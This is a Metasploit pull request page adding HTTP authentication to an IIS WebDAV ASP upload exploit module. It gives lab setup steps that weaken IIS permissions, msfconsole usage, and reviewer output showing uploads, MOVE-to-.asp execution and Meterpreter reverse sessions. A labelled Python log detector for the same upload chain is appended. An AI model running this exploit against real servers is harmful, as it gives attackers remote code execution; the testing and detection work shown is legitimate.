Fix #4115 - iis_webdav_upload_asp.rb should support http auth #4124

Merged
merged 2 commits into from Nov 6, 2014

@wchen-r7
Contributor

wchen-r7 commented Nov 3, 2014

HTTP auth is already implemented in Rex so there is really no point to say it can't do it. I also changed the error/warning messages to be more informative about why the module fails.

Setup for verification

  • Windows XP SP3
  • IIS 5.1. If you don't have this, you can install it from the Windows Components Wizard.
  • For testing purposes, make sure there is no firewall
  • After the IIS installation, create a folder in C:\Inetpub\wwwroot\upload
  • Add a new user "Everyone" to the "upload" folder, and grant "Full Control" to it. You need this setting for Verification 1. But Integrated Windows authentication doesn't need this setting.
  • Make sure you know the password for the default Windows user (which I think is Administrator). Set one if it's blank: net user Administrator [password] in command prompt.
  • Go to Administrative Tools -> Internet Information Services.
  • Right click on the 'upload' folder, go to Properties
  • Check Script source access
  • Check Read
  • Check Write

Verification 1: Test without auth

  • Start msfconsole
  • use exploits/windows/iis/iis_webdav_upload_asp
  • set rhost [IP]
  • set path /upload/test.asp
  • run
  • You should get a session
  • When you're done with this test, make sure to remove C:\Inetpub\wwwroot\upload\test.asp for the next test.

Verification 2: Test with Windows authentication

In order to test authentication, you need to go to Administrative Tools -> Internet Information Services and configure a few things:

  • Right click on the 'upload' folder, go to Properties
  • Click on the 'Directory Security' tab
  • Click on 'Edit' under 'Anonymous access and authentication control'
  • Uncheck 'Anonymous access'
  • Check 'Integrated Windows authentication'

Ok, then you're ready to test:

  • Start msfconsole
  • use exploits/windows/iis/iis_webdav_upload_asp
  • set rhost [IP]
  • set path /upload/test.asp
  • set username [valid username]
  • set password [valid password]
  • run
  • You should get a session

If you want, you can also test with a bad username/password too. In that case, you should see "401 Access Denied" when the module tries to upload the ASP file.

  • When you're done with this test, make sure to remove C:\Inetpub\wwwroot\upload\test.asp for the next test.

Verification 3: Script source access permission

Before you test this, make sure that:

  • You are still using the same auth instructed from Verification 2
  • Back to your IIS manager, right click on the 'upload' folder -> Properties
  • Make sure the "Script source access" is unchecked.
  • This time, your exploit will fail, and you should see this message: "The MOVE verb failed to rename the file. Possibly IIS doesn't allow 'Script Resource Access'."

Verification 4: Read permission

  • Still the same auth from Verification 2
  • This time, make sure 'Read' is unchecked. (but the other two such as "Script source access" and "write" should be checked)
  • Run the exploit, and you should see: "IIS possibly does not allow 'Read' permission"

Verification 5: Write permission

  • Still the same auth from Verification 2
  • This time, make sure 'Write' is unchecked. (but the other two such as "Script source access" and "read" should be checked)
  • Run the exploit, and you should see: "It's possible either you set the PATH option wrong, or IIS doesn't allow Write permission"

@jvazquez-r7
Contributor

  • Test without auth:
msf exploit(iis_webdav_upload_asp) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Uploading 613830 bytes to /upload/test.txt...
[*] Moving /upload/test.txt to /upload/test.asp...
[*] Executing /upload/test.asp...
[*] Sending stage (770048 bytes) to 172.16.158.131
[*] Deleting /upload/test.asp, this doesn't always work...
[!] Deletion failed on /upload/test.asp [403 Forbidden]

meterpreter > getuid
Server username: JUAN-C0DE875735\IWAM_JUAN-C0DE875735
meterpreter >

@jvazquez-r7
Contributor

  • Test 2 Test with Windows authentication
  • correct credentials
msf exploit(iis_webdav_upload_asp) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Uploading 613909 bytes to /upload/auth.txt...
[*] Moving /upload/auth.txt to /upload/auth.asp...
[*] Executing /upload/auth.asp...
[*] Sending stage (770048 bytes) to 172.16.158.131
[*] Deleting /upload/auth.asp, this doesn't always work...
[!] Deletion failed on /upload/auth.asp [403 Forbidden]

meterpreter > exit
[*] Shutting down Meterpreter...
  • Incorrect credentials
msf exploit(iis_webdav_upload_asp) > set PASSWORD admin2
PASSWORD => admin2
msf exploit(iis_webdav_upload_asp) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Uploading 613959 bytes to /upload/auth.txt...
[-] Upload failed on /upload/auth.txt [401 Access Denied]

@jvazquez-r7
Contributor

  • Test 3
msf exploit(iis_webdav_upload_asp) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Uploading 612527 bytes to /upload/auth.txt...
[*] Moving /upload/auth.txt to /upload/auth.asp...
[*] Executing /upload/auth.asp...
[-] Execution failed on /upload/auth.asp [404 Object Not Found]
[-] The MOVE verb failed to rename the file. Possibly IIS doesn't allow 'Script Resource Access'.

@jvazquez-r7
Contributor

  • Test 4:
msf exploit(iis_webdav_upload_asp) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Uploading 609617 bytes to /upload/auth.txt...
[*] Moving /upload/auth.txt to /upload/auth.asp...
[-] Move failed on /upload/auth.txt [403 Forbidden]
[-] IIS possibly does not allow 'Read' permission, which is required to upload executable content.

@jvazquez-r7
Contributor

On the write permissions tests I read:

msf exploit(iis_webdav_upload_asp) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Uploading 609292 bytes to /upload/auth.txt...
[-] Upload failed on /upload/auth.txt [403 Forbidden]

But all the results make sense to me, so landing!
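
The module output in the comments above shows what a successful run leaves on the server: a file uploaded with a non-script extension, a MOVE that renames it to .asp, then a request that executes it. As an added example (not part of this pull request or of Metasploit), this Python sketch looks for that chain in an IIS W3C log; the sample log lines, the selected log fields, the extension list and the 5-minute window are constructed assumptions.

```python
import posixpath
from datetime import datetime, timedelta

SCRIPT_EXTS = {".asp", ".asa", ".cer"}   # assumed script-mapped extensions
WINDOW = timedelta(minutes=5)            # assumed correlation window

# Constructed sample log (not from the PR); assumes date and time fields are enabled.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2014-11-05 10:00:01 192.0.2.10 PUT /upload/auth.txt 201
2014-11-05 10:00:02 192.0.2.10 MOVE /upload/auth.txt 201
2014-11-05 10:00:03 192.0.2.10 GET /upload/auth.asp 200
2014-11-05 10:05:00 192.0.2.20 PUT /upload/auth.txt 401
2014-11-05 10:06:00 192.0.2.30 PUT /upload/notes.txt 201
2014-11-05 10:06:01 192.0.2.30 MOVE /upload/notes.txt 403
2014-11-05 10:07:00 192.0.2.40 GET /default.asp 200
""".splitlines()

def parse_w3c(lines):
    """Yield one dict per request, named by the most recent #Fields directive."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rec = dict(zip(fields, line.split()))
            rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
            yield rec

def find_upload_move_exec(lines):
    """Return (client, uploaded_stem, executed_stem) per PUT -> MOVE -> script request chain."""
    staged, moved, hits = {}, {}, []
    for r in parse_w3c(lines):
        ok = r["sc-status"].startswith("2")      # 401/403 steps, as in the failed tests, break the chain
        client, stem, method = r["c-ip"], r["cs-uri-stem"].lower(), r["cs-method"]
        ext, folder = posixpath.splitext(stem)[1], posixpath.dirname(stem)
        if method == "PUT" and ok and ext not in SCRIPT_EXTS:
            staged[(client, stem)] = r["ts"]
        elif method == "MOVE" and ok and (client, stem) in staged:
            if r["ts"] - staged.pop((client, stem)) <= WINDOW:
                # Assumption: the MOVE target is not in these fields, so track the folder.
                moved[(client, folder)] = (stem, r["ts"])
        elif method in ("GET", "POST") and ok and ext in SCRIPT_EXTS:
            hit = moved.get((client, folder))
            if hit and r["ts"] - hit[1] <= WINDOW:
                hits.append((client, hit[0], stem))
                del moved[(client, folder)]
    return hits
```

Calling find_upload_move_exec(SAMPLE_LOG) reports only the 192.0.2.10 chain; the clients whose PUT or MOVE was refused, and the plain GET of an existing .asp page, produce no hit.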

@wchen-r7
Contributor Author

wchen-r7 commented Nov 6, 2014

Looks good.

@wchen-r7
Contributor Author

wchen-r7 commented Nov 6, 2014

Thanks @jvazquez-r7

@jvazquez-r7 jvazquez-r7 merged commit 9a27984 into rapid7:master Nov 6, 2014
jvazquez-r7 added a commit that referenced this pull request Nov 6, 2014
@wchen-r7 wchen-r7 deleted the iis_webdav_upload_asp branch August 22, 2016 16:31